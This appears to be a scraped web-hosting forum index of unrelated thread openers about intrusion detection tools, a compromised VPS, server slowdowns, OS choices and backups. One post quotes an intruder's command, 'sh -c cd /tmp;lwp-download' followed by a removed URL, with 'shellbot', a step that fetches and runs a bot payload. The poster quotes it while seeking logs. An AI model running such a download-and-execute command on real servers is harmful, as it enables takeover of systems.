IDS - Intrusion Detection System
Sep 25, 2007I have recently been using snort but I need something ideally graphically based so that it is easy to use and find your way around.
Can anyone recommend an IDS product that has a GUI?
ADVERTISEMENT
Tripwire Intrusion Detection
Jul 30, 2007I downloaded the tripwire version 2.4.1.1 but after the installation the /etc/tripwire/twinstall.sh file is not generated after the installation. I checked the contents of the RPM I downloaded and the script is not there.
How can I prepare the cfg file without this script?
[root@user]# rpm -qpl tripwire-2.4.1.1-1.i386.rpm
/etc/cron.daily/tripwire-check
/etc/tripwire
/etc/tripwire/twcfg.txt
/etc/tripwire/twpol.txt
/usr/sbin/siggen
/usr/sbin/tripwire
/usr/sbin/tripwire-setup-keyfiles
/usr/sbin/twadmin
/usr/sbin/twprint
/usr/share/doc/tripwire-2.4.1.1
/usr/share/doc/tripwire-2.4.1.1/COMMERCIAL
/usr/share/doc/tripwire-2.4.1.1/COPYING
/usr/share/doc/tripwire-2.4.1.1/ChangeLog
/usr/share/doc/tripwire-2.4.1.1/License-Issues
/usr/share/doc/tripwire-2.4.1.1/README.Fedora
/usr/share/doc/tripwire-2.4.1.1/TRADEMARK
/usr/share/doc/tripwire-2.4.1.1/policyguide.txt
/usr/share/doc/tripwire-2.4.1.1/tripwire.gif
/usr/share/man/man4/twconfig.4.gz
/usr/share/man/man4/twpolicy.4.gz
/usr/share/man/man5/twfiles.5.gz
/usr/share/man/man8/siggen.8.gz
/usr/share/man/man8/tripwire.8.gz
/usr/share/man/man8/twadmin.8.gz
/usr/share/man/man8/twintro.8.gz
/usr/share/man/man8/twprint.8.gz
/var/lib/tripwire
/var/lib/tripwire/report
Intrusion Detection Tool Request
Jul 25, 2007Is there a tool for intrusion detection where a central machine is responsible for requesting clients for file and directory information and reporting changes?
Do you know of any open source package preferable are available for RHEL4 and 5?
Server Intrusion: Quick Fixes & What To Do
Nov 7, 2008server intrusion: quick fixes
View 12 Replies View RelatedRootkit Detection On A Windows VPS
May 4, 2007My Windows VPS has come under heavy attack by hackers trying to get through MSFTPSVC for the past month and they finally managed to somehow get in 2 days ago. Somehow, the "Allow anonymous login" setting was selected in my FTP settings and they got in.
They even managed to turn off my firewall. I guessing they used a buffer overflow or some other Windows Server 2003 weakness that was fixed in SP2 (too bad SP2 is'nt supported by SWSoft yet).
The attacks began less than 1 week after I had signed up with Virpus. I did'nt even have my domain name pointing to the server or a site up when the first set of dictionary attacks began. How common is that 0_0 ?
Anyway, since I now know they've gotten in I've run a virus check and everything looks clean but I really want to run some kind of root kit detection software. I've tried everything suggested on the antirootkit website but none of them seem to work on a VPS.
Brute Force Detection (bfd)
Apr 6, 2007ive just installed bfd on a new server:
[url]
And im getting the following in an email every 10 minutes:
Code:
/usr/local/bfd/conf.bfd: line 26:
: command not found
/usr/local/bfd/conf.bfd: line 38:
: command not found
/usr/local/bfd/conf.bfd: line 47:
: command not found
/usr/local/bfd/conf.bfd: line 59:
: command not found
/usr/local/bfd/conf.bfd: line 60:
: command not found
/usr/local/bfd/conf.bfd: line 76:
: command not found
/usr/local/bfd/conf.bfd: line 88:
: command not found
The email is being sent from:
Cron Daemon <root@hostname.com> (replaced hostname myself)
Now i know this isnt r-fx networks support but none of there support options seem to work so i figured id post here considering the amount of users that are likely to be using bfd (or you should be)
Hacker Detection On Apache Log Files
Jul 2, 2009I have a client that is certain someone is trying to hack her web-portal. I need to set up something that will alert me on suspicious activity on the server. For example someone fiddling with requests trying to make SQL / shell .. injection and similar threats.
Does any tool (for example bash script with grep) exist that would parse the raw apache logs and report if something is suspicious. Apache logs don't show the POST data so I am talking to admin to setup dump_io apache mod that enables this.
Or am I going into wrong direction here and there is whole another way to do this? I searched the web and forums for anything like this and didn't find anything.
KVM Over IP System
Jul 23, 2008I have a few different types of servers, all of which came with their own KVMoIP setup, aka DRAC and iLO which have worked only so so since their deployment. The HP iLO has performed absolutely flawlessly but the DRAC on the other hand has been nothing less than a complete nightmare.
I'm looking for a KVM over IP system that we can connect to multiple servers, mainly Dell, that is 100% reliable and completely stable. Not something that will be giving Java errors randomly when you actually need it to work.
So far I've came across the Raritan Dominion KX II which looks pretty promising. Is there any other KVM over IP systems or manufactures that I should look into? Has anyone used this and can you comment about its reliability?
Slow System
Aug 11, 2008Recently, my server has been running real slow and I don't know why... I've not noticed any increase in traffic (In fact it goes slow with no traffic on it...), what are some things I can look at to try and diagnose the problem? I know next to nothing about *nix so please speak in great detail.
Anytime I restart Apache, it loads quick for a few seconds then gets slow again...
Here are the top few processes listed on the process manager: .....
Allocate System Ram
Jul 22, 2008I have a VPS acct with Plesk, am peaking out my system ram at 128mb. Host said to allocate ,ore = purchase more. What I would like to do is hunt down where I am using the most of it. I have 8 sites (non that are too big). Most of them are wordpress sites.
Would caching help? Not sure where to look to find this out.
Invoicing System
Dec 27, 2007Is there any billing software/scripts that enable customer to view their invoice without login?
View 5 Replies View RelatedSystem Cleaning
Aug 6, 2007Is there anything like System cleaning in VPS (Linux with apache) ? I need to do system cleaning so that my space and performance can increase.
Is there anything like that in Linux?
System Warning
Mar 21, 2007Ive been getting the following System Warning every hour since I set the server up 5 days ago and Google hasn't been a lot of help in tracking down what it means and if I should be concerned. Im hoping someone here can point me in the right direction. Im running Windows 2003 Web Edition.
Quote:
Event Type:Warning
Event Source:LSASRV
Event Category:SPNEGO (Negotiator)
Event ID:40960
Date:3/20/2007
Time:7:45:33 PM
User:N/A
Computer:B02S08MR
Description:
The Security System detected an authentication error for the server DNS/ns.ufcom.com. The failure code from authentication protocol Kerberos was "There are currently no logon servers available to service the logon request.
(0xc000005e)".
For more information, see Help and Support Center at
[url]
Data:
0000: 5e 00 00 c0
System Logs
Jul 26, 2007I keep receiving hacking attempts from someone accessing my server and running commands like these:
Code:
hubberfix
sh -c cd /tmp;lwp-download [url]
shellbot
I cannot find any logs with these attempts. Or at least any with info like an IP address or host doing this.
Not to sound like a noob, but where can I find logs that would tell me all the commands run on my system? FYI, I'm running Debian Sarge, and I looked in "/var/log" and I can't find much of anything.
Which Operating System
Feb 18, 2007There's bloody heaps of them. Which one do I go for on my two new file servers? Which operating system out of these is the most common, has the most support, is most compatible? The server will be used to host videos and will run c-panel. A light weight OS is probably preferred but I really have no idea. And incase it helps, the servers have 512mb of ram, about 30 - 40GB of hDD (not actually sure) and an old AMD Duron.
CentOS
Debian
Direct Admin
Fedora
FreeBSD
Gentoo LiveCD
Redhat
Slackware
Whole System Backup
Aug 26, 2007I just spent over 10 hours on my node configuration (debian etch). I have installed a lot of stuff, made raid1 array, control panel, some tools, rules etc etc etc.
I dont want to see that some day something crash - and I will must start over with everything.
What you guys suggest as backup method, maybe some how-to backup WHOLE system with all files, raid configuration etc.
I dont need incremental backups at all - I just want to save/backup current system, and maybe restore if something bad would happen.
Which The Best Operational System For Vps?
Jul 12, 2007which of these operational systems is the best one for one vps?CentOS 4 (32bit)
CentOS 4 (64bit)
CentOS 5 (32bit)
Fedora Core 3 (32 bit)
Fedora Core 4 (32 bit)
Fedora Core 5 (32bit)
Debian Sarge 3 (32bit)
Gentoo 3 (32 bit)
Opensuse 10 (32 bit)
Suse 9 (64 bit)
Ubuntu 6 (32bit)
Windows 2003 Std
Linux System
Jan 3, 2007I am planning to start linux hosting but don't have much knowledge about linux Operating system... can I do this without having sufficient knowledge of linux background?
Also please suggest me some good links from where I can get basic linux command and some kind of flash tutorials from which I get to know how to do work in Appache and dns etc.
how to download tar file using Terminal,
Recommended File System
Aug 2, 2009I have a dedicated server running Linux CentsOS.
The default setup of my file system is:
/dev/sda1 450GB
tmpfs 2GB
/usr/tmpDSK 485 MB
My Disk size is 500GB
Ticket System And WHM And Cpanel
Jul 14, 2009I have VPS having whm/cpanel base, i also install RT ticket system, it install successfully, same way i did on 5 other server its ok, but on VPS due to apache different configuration it gives me.
You haven't yet configured your webserver to run RT. You appear to have installed RT's web interface correctly, but haven't yet configured your web server to "run" the RT server which powers the web interface. The next step is to edit your webserver's configuration file to instruct it to use RT's mod_perl, FastCGI or SpeedyCGI handler.
Secure Virtuozzo System
Aug 14, 2008Does someone know a good article for secure a virtuozzo node/host server?
View 0 Replies View RelatedWhich Content Management System (CMS)
Feb 24, 2009I wondered which Content Management System (CMS) is the best for a website? I read that there are many to choose from, examples are Wordpress, Drupal, Joomla etc. Which CMS is more SEO Optimised?
Th website I will be setting up will be of the same genre as the following website startutor.sg. Therefore, I am wondering what CMS to use.
I thought of designing the website using AI or PSD and asked someone to code them (not sure of the terminology used) for me as I don't know anything about CSS, HTML etc.
System Clock Off Continuously
May 12, 2009One of our server's system clock seems to gradually creep away from the correct time. It has been causing us a lot of issues. After one day it becomes more than one hour off. After each minute it becomes a few seconds off.
Any ideas what could be causing this? It's uptime is ~2 months so it doesn't happen when it goes offline, it happens while it is running.
Right now we have a cronjob running ntpdate every few minutes as even with the ntpd service running it would end up off by several minutes when we would check. I have a feeling this isn't a very reliable fix though.
Read-only System 3rd Time
Jun 11, 2009I have brand new server with CentOS 5.3 and latest CentOS kernel (2.6.18-128.1.10.el5PAE).
I have brand new HDDs with no errors (HDDs have only 1000 power-on-hours, server CPU temperature is normal - between 35-42 C). My server went read-only without any reason. I need to fsck main / partition (/home is separated) and it cleaned journal, then server became online.
After 2 weeks it happens again - I did again fsck on / partition and it recovered journal as before. I decided to ask Data Center to replace RAID-1 card and memory - they did it. After 3 weeks server went read-only again.
I ssh into server and saw that kswapd0 process is using 100% cpu and load is over 170.
After fsck it recovered journal on / and server is again available.
Perl System Mail
Jan 14, 2009I am trying to write a perl script, it send's mail to a user i used system(mail -s test) and also send some messages using this.
but my issue is i receive mail with html code like <br> and so..
how to get a plain mail using this system command.
Which Ticket System Does The Hostgator Use?
Feb 6, 2009is there anybody knows which ticket system does the Hostgator use? Or that is theirs unique system?
View 14 Replies View RelatedServer Became Read Only System
Mar 29, 2009I had a linux server (CentOs 5, mysql5, php5, directadmin). I had problems with apache few days ago, that's why i hire sys. admin who tweak the system (install the PAE kernel), and some more configurations, and during last 7-8 days server work w/o any downtime (before this server had 1-2 downtimes per day-> OOM killer.)
Now i had only ssh access (emails, directadmin access - give "wrong password" answer). As told my sys.admin It became read only system.
I cann't even reboot system
Quote:
[root@server sa]# reboot
reboot: /usr/local/lib/libpng12.so.0: no version information available (required by /usr/lib/libcairo.so.2)
such few commands work, the most commands that i know don't work
Quote:
[root@server ~]# ls -la
ls: error while loading shared libraries: libacl.so.1: cannot open shared object file: No such file or directory
HostMonster.com System Loads
Aug 21, 2008I have a shared host with them for a few months which the disk usage for home/backup is usually around 85-95%. Right now I am experiencing very slow download speed. What about yours?
Server Load 2.92 (8 cpus)
Memory Used 42.6 %
Swap Used 0.01 %
Disk /dev/sdc1 (/home) 91 %
Disk /dev/sdd1 (/backup) 90 %
Disk /dev/sde1 (/backup/cpbackup/weekly) 43 %
Disk /dev/ram0 (/ramdisk) 24 %
Disk /dev/sdb1 (/) 22 %
